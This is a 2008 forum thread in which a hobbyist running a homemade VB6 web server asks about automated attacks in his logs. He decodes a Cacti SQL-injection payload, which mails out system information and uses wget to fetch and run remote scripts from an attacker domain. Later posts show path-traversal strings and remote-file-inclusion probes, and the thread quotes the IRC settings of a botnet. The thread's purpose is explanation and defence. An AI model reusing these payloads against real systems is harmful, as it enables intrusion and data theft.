So, i wrote some little vb6 web server awhile back to convert binary data to html pages for d2 players to view, but i noticed today i had the following requests, and am just wundering if anyone knows what they are trying to do? lol
Quote
[01:14:00] [Client 0] Querying: \cacti\cmd.php
[05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\
2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR
(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101,
116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109,
112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99,
97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46,
50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32,
47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32,
45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46,
47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111
[05:41:13] Connection From 69.42.162.18:18613
[05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log
What are they trying to do? hax it?
Sry if this is wrong forum, just interested to know what they think they are going to accomplish.
edit: Just converted that mumbo jumbo char's to a string and got the following:
/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out;
cat /tmp/out | mail -s XX.X.XX.XXX hacked [email protected];wget www.alexutz.as.ro/t -O /tmp/t;
chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log
Lol
Aside, XX.X.XX.XXX was my ip
[Kp edit: broke up the command line. It broke the table.]
You should send them an E-Mail telling them to try again, but this time do it right.
lol
Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log?
I get the jist they were trying to get my server to email them of success, but i have almost no exp with web server software (hence wrote my own) but surely it cant be that easy to hax a site?
All they got from me was "Page can not be found" heh
That looks like a totally automated attack, unless you actually have "cmd.php".. probably somebody scanning random IP ranges.
ah, Cool, nothing to worry about then. (nah i dont have any php files, idk any php)
They also tryed it the day before i think, because i forgot to add error handling for opening files, because my server crashed with the run time error "bad file number or name" :(
thx for info
I concur, that looks automated. It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address. It would then download additional code using wget and execute that. That command line requires tools that're standard on Unix systems, but they're not standard on Windows.
The content of that suntzu.log would be whatever was printed by the Perl script. Someone would have to download the script and examine it to find out what it prints.
As an aside, whoever wrote that wasn't very good. There's no need to create so many temporary files.
Ah ::)
To bad for them I guess, that sounds kinda lame :'(
Thx for info, at least I know what they were up to now :P
Im gonner put some funny text for them in \cacti\cmd.php just incase they do it again.
If you want to know more, i'd suggest connecting to this ircd:
Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';
Odds are pretty good that you could commandeer the entire botnet.
Quote from: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, i'd suggest connecting to this ircd:
Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';
Odds are pretty good that you could commandeer the entire botnet.
You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor).
Mmm, tmp is awesome. :)
Hm, I got another strange one today (seem to get this one alot)
[09:04:11] Connection From 67.19.246.130:29261
[09:04:11] Item Drop Rate Pages Updated In 32ms
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg
[09:04:11] [Client 1] Connection Closed.
Im guessing this one is automated as well, and is some kind of configeration file?
Would it be wise for me to IP ban clients that request files from \cacti\ and \cgi-bin\?
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)
I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Quote from: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Haha, i just tryed with iexporer and got:
[22:11:38] [Client 0] Querying: \test.txtThen tryed it from a program i was useing to open pages to view html with, and got:
[22:26:30] [Client 0] Querying: \..\test.txtand in the requesting program:
[22:26:30] HTTP/1.1 200 OK
Date: Mon, 11 Feb 2008 22:26:30
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8
OMFG this is a test
LOL
So, yeah, you could have back pathed to that file :D
Not any more tho. :)
I was wundering the other day if its possible to back path, wow lol.
Thanks for bringing that to my attention :P
Is there any other way to back path like that?
If you're removing ../, make sure you also pick up the unicode variations and malformed versions (ie, does .%00./ work? Does ...///../// work? Does ..%ff/ work?
There have been countless problems like that plaguing IIS over the years.
ooch, thanks
Atm im just nurfing it like this:
strFilePath = Replace(strFilePath, "/", "\")
strFilePath = Replace(strFilePath, "..", "")
strFilePath = Replace(strFilePath, "\\", "\")
If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then
Call SendWebPage(App.Path & "\Error.html")
Exit Sub
ElseIf IsValidFile(strFilePath) = False Then
Call SendWebPage(App.Path & "\Error.html")
Exit Sub
End If
IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one)
Im guessing it would be a good idea, next time my cpu is idle, to brute force the dir() function and log any succesfull backpathing?
If you're playing around, don't forget encodings -- Unicode, UTF-8, invalid UTF-8, stuff like that.
I suggest writing an IsSubdirOf() function that makes sure you end up in the proper folder.
lol, i think somone hates me :P
[02:23:49] Connection From 207.150.178.18:8769
[02:23:50] [Client 0] Querying: \index.php?
page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php?
size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00
[02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php?
tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:22] [Client 0] Querying: \includes\functions_mod_user.php?
phpbb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php?
bkpwp_plugin_path=
[02:24:44] [Client 0] Querying: \classes\core\language.php?
rootdir=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:24:55] [Client 0] Querying: \components\com_smf\smf.php?
mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:25:06] [Client 0] Querying: \vbgsitemap\vbgsitemap-config.php?
base=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
[02:25:17] [Client 0] Querying: \public_html\modules\Forums\favorites.php?
nuke_bb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&
Trying to traverse your directories... lol.
Yeah, I tend to see automated scans daily. I've just started to ignore them. :)